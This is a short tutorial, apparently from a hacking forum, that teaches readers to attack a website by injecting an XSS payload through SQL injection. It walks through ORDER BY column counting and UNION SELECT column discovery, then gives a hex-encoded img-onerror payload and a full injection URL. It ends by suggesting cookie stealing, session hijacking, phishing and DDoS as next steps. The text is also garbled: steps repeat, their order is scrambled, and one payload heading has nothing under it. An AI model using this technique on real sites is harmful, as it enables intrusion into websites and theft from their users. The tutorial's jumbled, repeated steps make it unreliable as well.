I am going to tell you that how to attack a website using XSS (Cross-Site-Scripting + SQLi).
Step 3: Finding the Vulnerable column using UNION ALL SELECT methods.
Step 4: Now we will inject our XSS payload into it. To make things simple we will encode our payload into hex.
Our XSS injection Payload
<img src=x onerror=confirm(/XSS/)>
Our Hex Encoded Payload
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
- This is pretty simple! We just have to inject our JavaScript code in the website
Step 1: First we have to find a SQLi vul. Site.
Like this:
http://www.site.in/index.php?id=3
Like this:
http://www.site.in/index.php?id=3
Step 2: Finding the number of columns on the site using ORDER BY method.
- Suppose our site have 9 columns!
Step 3: Finding the Vulnerable column using UNION ALL SELECT methods.
- And the most vul column is 3!
Step 4: Now we will inject our XSS payload into it. To make things simple we will encode our payload into hex.
Our XSS injection Payload
<img src=x onerror=confirm(/XSS/)>
Our Hex Encoded Payload
Step 5: Injecting The Payload Into Our Site!
Like This:
http://site.com/index.php?id=-3' union
select
1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4,5,6,7,8,9--+
NOTE:
The above url will output the our XSS payload into the Website. This one is basic XSS payload, now we are free to do other things using XSS like Cookie stealing, XSS phishing, XSS iFrame Phishing, Chained XSS, Session Hijacking, CSRF attack, XssDdos and other attacks